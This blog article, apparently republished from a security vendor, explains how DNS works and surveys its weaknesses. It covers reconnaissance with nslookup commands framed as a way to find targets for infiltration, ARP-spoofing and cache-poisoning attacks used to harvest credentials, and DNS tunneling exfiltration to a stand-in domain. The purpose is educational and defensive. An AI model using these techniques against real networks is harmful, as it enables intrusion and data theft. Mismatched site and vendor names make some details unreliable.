Bigfivehost Website Performance What is DNS: How it Works and Domain Name System Vulnerabilities

What is DNS: How it Works and Domain Name System Vulnerabilities

September 29, 2024September 29, 2024| adminadmin| 0 Comment| 1:37 pm
What is DNS: How it Works and Domain Name System Vulnerabilities post thumbnail image
Categories:

The Domain Name System (DNS) is a fundamental component of modern networking that translates between human-readable domain names and the underlying Internet Protocol (IP) addresses that connected devices use to talk to each other. DNS pre-dates the World Wide Web, and facilitates virtually all communications over the Internet, as well as other uses that couldn’t even have been dreamt of when it was developed in the early 1980s. However, the lack of security features in this long-lived networking protocol has led to numerous vulnerabilities and attacks. In this article, we’ll answer questions like “What is DNS?”, “How Does DNS Work?”, and “What Are The Different Types of DNS Records?”

  • What Is DNS?
  • How DNS Works
  • DNS Queries, Servers, and Record Types
  • Advantages and Weaknesses of DNS
  • Types of DNS Attacks
  • Hijacking DNS to Redirect Traffic
  • Using DNS as a Covert Channel

What Is DNS?

DNS is often referred to as the internet’s version of the Yellow Pages. Back in the olden times, when you needed to find a business’ address, you looked it up in the Yellow Pages. DNS is just like that, except you don’t actually have to look anything up: your internet-connected computer does that for you. It’s how your computer knows how to find Google, or Newszetu.com, or bigfivehost.com.

Hate computers professionally? Try Cards Against IT.

For two computers to communicate on an IP network, protocol dictates that they need an IP address. Think of an IP address like a street address – for one computer to “locate” another, they need to know the other computer’s number. Since most humans are better at remembering names – www.bigfivehost.com – than numbers – 95.111.242.18, they needed a program for computers to translate names into IP addresses.

DNS is most often thought of in the context of the World Wide Web, but in truth, there’s a DNS lookup behind nearly every type of network request – even those not initiated by a user. Software updates, social media apps, and even malware will generally reach out to a hostname rather than an IP address. This way, if the underlying IP address changes, connectivity can still be established.

How DNS Works

how dns works

DNS is such an integral part of the internet that it’s important to understand how it works.

Think of DNS like a phone book, but instead of mapping people’s names to their street address, the phone book maps computer names to IP addresses. Each mapping is called a “DNS record.” DNS clients on connected devices reach out to DNS servers to retrieve these records. Different record types are used for different purposes. Web browsers rely on an “A” type record, while the “MX” record points the direction towards a mail server. This is how it’s possible to host a website with one service provider and email service at another.

Here’s a look at the “A” record for varonis.com as viewed from a popular command-line utility called DiG:

dig

As you can see in the example, it’s possible to have multiple records for a single hostname or domain. This can be used to provide both redundancy and load balancing.

The internet has a lot of computers, so it doesn’t make sense to put all of these records in one big book. Instead, DNS is organized into smaller books or domains. Domains can be very large, so they are further organized into smaller books, called, “zones.” No single DNS server stores all the books – that would be impractical.

Instead, DNS operates in a distributed fashion, with millions of servers around the world working together. When your computer wants to perform a DNS lookup, it might ask the DNS server on your local router. The local router will in turn make an “upstream” query to another DNS server, often provided by an Internet Service Provider. Queries for a domain can go “upstream” until they reach the domain’s authority, or “authoritative name server.” In practice, results are often “cached” at lower levels to avoid the need to go through the entire process for every query.

An authoritative name server is where administrators manage server names and IP addresses for their domains. Whenever a DNS administrator wants to add, change or delete a server name or an IP address, they make a change on their authoritative DNS server (sometimes called a “master DNS server”). There are also “slave” DNS servers; these DNS servers hold copies of the DNS records for their zones and domains.

DNS Queries, Servers, and Record Types

The basic concepts behind DNS are relatively straightforward, but over the years the technical side of things has grown increasingly complex. Here’s a look at some of the system’s inner workings:

What Are the Types of DNS Queries?

types of dns

A DNS query is the message sent from a client to a DNS server, or between two DNS servers. A DNS query can be one of the following:

  1. Recursive DNS Query

In a recursive DNS query, a DNS client will reach out to a server, which will in turn make upstream requests for the domain in question until a result is found. The only set rule for a recursive query is that a result must be returned, if there is one. There can be a single or dozens of recursions. The initial server or even the local DNS client may have a result already cached. A time-to-live (TTL) value governs how long one of these results can be cached; once the TTL has been reached, the client or server will need to look upstream for the results.

  1. Iterative DNS Query

In contrast to recursive DNS queries, iterative DNS queries don’t travel upstream. Instead, the DNS server the client reaches out to will do it’s best to answer the query. If it can’t, it may suggest a different DNS server such as the authoritative name server or TLD name server. The requester will continue this iterative process until it finds an answer or times out.

What are the Types of DNS Server?

As stated already, DNS is a distributed system, meaning that servers all over the world work together to maintain and deliver DNS records. Different types of servers have different roles within the overall system:

  1. DNS Recursor

Sometimes called a recursive resolver, a DNS recursor receives queries from DNS clients, responds if a hit is available in cache, or reaches out to a nameserver further up the chain. Recursors are often run by Internet Service Providers, but its easy to change the DNS configuration of a computer to point to another source for performance, security, or privacy reasons.

  1. DNS Root Server

As the name implies, root servers are the foundation from which the entire DNS infrastructure grows. Root servers act as the authoritative name server for top-level domains (TLDs) like “.com” and “.net”. There’s a problem, however, because the root servers themselves are referred to by hostnames within those very same TLDs. If a DNS client can’t determine which nameserver to turn to for “.net”, how can it possibly resolve a full domain like “a.root-servers.net”? The answer is that DNS clients and lower level servers are “bootstrapped” with a list of thirteen root server IP addresses. These addresses don’t tend to change often, and only one of them needs to be reachable in order to resolve the others.

  1. TLD Name Server

TLD Name Servers are second in importance only to the root servers, as they know where to turn for answers about any domain within a given TLD. When you search for www.bigfivehost.com, a TLD server for the ‘.com’ will respond first, pointing the client towards the nameserver with the records for the ‘varonis.’ portion of the domain name.

  1. Authoritative Name Server

The authoritative name server is the final stop for a DNS query. This server, or often servers for the sake of redundancy, is the highest authority for a given domain. Not all DNS queries make it up to the authoritative nameserver, however, as there may be cached results closer to the initial request.

Organizations also frequently use DNS internally. The operation isn’t much different, except that DNS lookups and records stay within the corporate network instead of on the Internet. This is known as “private” or “local” DNS in contrast to the public DNS service.

What are the types of DNS Records?

DNS Records come in a wide variety of types, each used for different purposes Here’s a look at just a few of the most common:

  1. “A” Record – Classic use of DNS, translates a domain into an IPv4 address.
  2. “AAAA” Record – Same functionality as an “A” record, but using an IPv6 address instead of IPv4.
  3. “MX” Record – Short for “Mail Exchange”, identifies the e-mail server associated with the domain.
  4. “TXT” Record – Used for a wide variety of purposes, from proving domain ownership to cryptographically signing emails to fight spam.

Advantages and Weaknesses of DNS

advantages vs weaknesses

DNS offers a number of both advantages and weaknesses:

Advantages

There are many good reasons we’re still using DNS after all these years. Some of the advantages of the system include:

  • It’s Distributed and Resilient

There weren’t many domains in use during the early days of the Internet, so it’s conceivable we could have ended up with a single central database with all of the domain-to-IP mappings. This, of course, wouldn’t have allowed for the scalability required to power the modern Internet. The distributed nature of DNS also means the system is resilient; a power outage, cut fiber cable, or cyberattack on one DNS server won’t disrupt the system as a whole.

  • It’s Versatile and Extensible

The developers of DNS always intended for the protocol to be extensible as technology progressed. Extensions to the original DNS standard have brought new features and functionality while still maintaining backward compatibility. New types of records, refined rules for the delivery of DNS packets, and enhanced security have all been added over the years.

  • It’s an Open and Well-Documented Standard

DNS wasn’t born out of a particular vendor’s dominance or desire to gain market share. The Internet Engineering Task Force (IETF) openly publishes the set of rules that make up the protocol, allowing any software developer to implement DNS in their products. Many different DNS client and server implementations exist, but because they conform to a common standard they can all work together.

Weaknesses and Vulnerabilities

The first iterations of the Domain Name System (DNS) date to the early 1980s, well before the emergence of modern cybersecurity threats. As a result, DNS – and many other older protocols still in use today, such as ARP and IMCP, never included much in the way of security features. A variety of extensions and mitigations have been dreamt up in the ensuing years as new threats have emerged, but DNS is still often abused by attackers.

From a threat actor’s perspective, there are several characteristics that make DNS appealing:

  • Every Network Uses It

DNS is ubiquitous. Nearly every computer network in the world will see thousands to millions of DNS queries every single day. While it’s not technically required to operate an IP network, blocking or restricting DNS simply isn’t practical, so nearly every firewall on the planet is configured to allow outbound traffic on port 53. This means that attackers not only have an almost guaranteed way out of a compromised network but there’s plenty of legitimate traffic they can blend in with as well.

  • There’s No Authentication

Like many other early network protocols, DNS never included an authentication mechanism. This means that in the core DNS protocol, there is no way to be sure a particular result is genuine. Attackers have taken advantage of this with a whole range of opportunities for spoofing and poisoning attacks targeting everything from individual machines to large swaths of the entire Internet.

The lack of authentication in DNS became front-page news in 2008 when security researcher Dan Kaminsky discovered a massive vulnerability that could have allowed attackers to poison the cache of nearly all DNS servers in use at the time. The result was that even with very little technical skill, an attacker could trick legitimate DNS servers into sending bogus IP information for important domains like a bank or government institution.

Faced with the threat of phony DNS records wreaking havoc on the Internet community, service providers and standards bodies came together to adopt something called Domain Name System Security Extensions (DNSSEC). DNSSEC uses public-key cryptography to digitally sign DNS results, guaranteeing that the response to a query is in fact genuine.

  • There’s No Encryption Either

DNS Queries and the accompanying responses are sent in plaintext, meaning anyone on the network can view them with a tool like Wireshark. This presents potential privacy problems because it means that your co-workers, boss, or even ISP can tell which domains you’ve interacted with. This is true even for websites that leverage SSL/TLS encryption; the actual data being transferred between the site and your computer may not be viewable, but that initial DNS query that gave you the site’s IP address in the first place is.

Two competing approaches have been advanced to wrap DNS traffic with a layer of encryption as it passes through a network: DNS over HTTPS (DoH) and DNS over TLS. Which approach to use – and whether DNS should even be encrypted in the first place – is a matter of fierce debate.

Types of DNS Attacks

DNS Reconnaissance Attacks

DNS is all about information, which from an attacker’s perspective can be an invaluable tool. DNS queries can be used to map out a victim’s network infrastructure by revealing live hosts on a network, uncovering the hostnames of high-value targets like mail and file servers, and providing clues about applications and services in use. You can perform your own local DNS recon mission just by following the instructions below:

If you have a Windows computer, run the following commands as is; if you are a Linux user, there are corresponding commands you can look up.

  1. Open up a command prompt (type Ctrl + esc, the letters “cmd,” then enter).
  2. Type ipconfig
  3. You’ll see the DNS domain you’re in (Connection-specific DNS Suffix), your IP address, and a bunch of other stuff. You will want to refer back to this.
  4. Type nslookup [ip address]  You’ll see the name of the DNS server that’s responding, and, if the name is known, the DNS record listing the name and IP address.
  5. nslookup –type=soa [your domain] This command returns your authoritative DNS server, wouldn’t that be handy if you were trying to infiltrate a network.
  6. nslookup –type=MX [your domain] That command returns all of the mail servers on your local domain, just in case you wanted to hack mail servers and didn’t know where they were.

As we’ve already learned, most networks have lots of DNS queries going on all the time. To many off-the-shelf security products and network monitoring solutions, the queries used by an attacker to enumerate a network don’t look much different from all of the other legitimate queries. Solutions like Varonis Edge address this problem by correlating DNS requests with other data points to identify suspicious behavior patterns.

Hijacking DNS to Redirect Traffic

The lack of authentication in the original DNS protocol gives attackers a huge upper hand because it means queries and responses can be manipulated or forged at many different points from the local machine right up to global DNS resolvers.

A classic local network attack involves chaining ARP Spoofing with a rogue DNS server. If successful, this will cause other machines on the network to funnel their DNS queries to a server that the attacker controls. The attacker can then return their own IP addresses for those queries instead of the rightful address. Without mitigations in place, a user could type in a domain like example.com, see a page load, and never have any indication that they were actually communicating with a malicious forgery.

Attackers can also use a variety of techniques to poison the cache of legitimate DNS servers. This generally occurs when organizations are running their own local DNS recursor; a successful cache poisoning attack on a large public DNS provider could have global impacts, so these providers tend to be very security conscious. However, even the large providers aren’t immune from vulnerabilities.

If an attacker successfully spoofs a DNS response, they can make the receiving DNS server cache a poisoned record. So how does that help the attackers?

Here’s an example: Let’s say an attacker learns that your organization uses an external application for something important, like expenses. If they poison your organization’s DNS server so that it sends each user to the attacker’s server, all they need to do is create a legitimate-looking login page, and users will enter their credentials. They might even relay the traffic to the real server (acting as a “man in the middle”), so no one notices. The attacker can then try those credentials on other systems, sell them or just celebrate with an evil laugh.

Using DNS as a Covert Channel

Since outbound DNS traffic is almost never blocked – and there tends to be a lot of it – using DNS for data exfiltration or covert communications has become a favorite tactic of many sophisticated adversaries. The attackers’ goal is to blend in with all that legitimate network traffic through a technique called DNS Tunneling. In some cases, an attacker will simply use the DNS protocol in ways it wasn’t intended to transfer data. This can be risky, however, as it could generate large spikes or unusual traffic patterns that a well-prepared organization can quickly notice.

A more sophisticated approach involves abusing DNS infrastructure itself. The malicious actor will set up a DNS domain (evil-domain.com, for example) on the internet and create an authoritative name server. Then, on the compromised host, the attacker can use a program that breaks up the data into small chunks and inserts it into a series of lookups, like so:

The corp.com DNS server will receive these requests, realize the results aren’t in its cache, and relay those requests back to evil-domain.com’s authoritative name server. The attacker is expecting this traffic, so it runs a program on the authoritative name server to extract the first part of the query (everything before evil-domain.com) and reassemble it. Unless the organization is inspecting the queries it is DNS servers make, they may never realize their DNS servers were used to exfiltrate data.

And Even More Types of Attacks!

The list above is by no means a complete list of all the possible DNS attacks. The protocol’s been abused for everything from DDoS campaigns to covert tracking of Internet users. Attackers have recently been observed modifying the DNS configuration in several varieties of home routers to spread malware. Malicious actors and security researchers alike are constantly probing for new vulnerabilities, and it’s unlikely their attention will shift any time soon.

DNS has been around for a long time, and every computer connected to the internet relies on it. Attackers now use DNS for both external and internal reconnaissance, to hijack traffic and to create covert communication channels. Luckily, by monitoring DNS servers and applying security analytics, many of these attacks can be detected and thwarted.

Want to see how?  Join our Live Cyber Attack Workshops as our security engineers execute a live attack – and exfiltrate data via DNS tunneling and see it all in real-time!

Credit: Source link

Related Post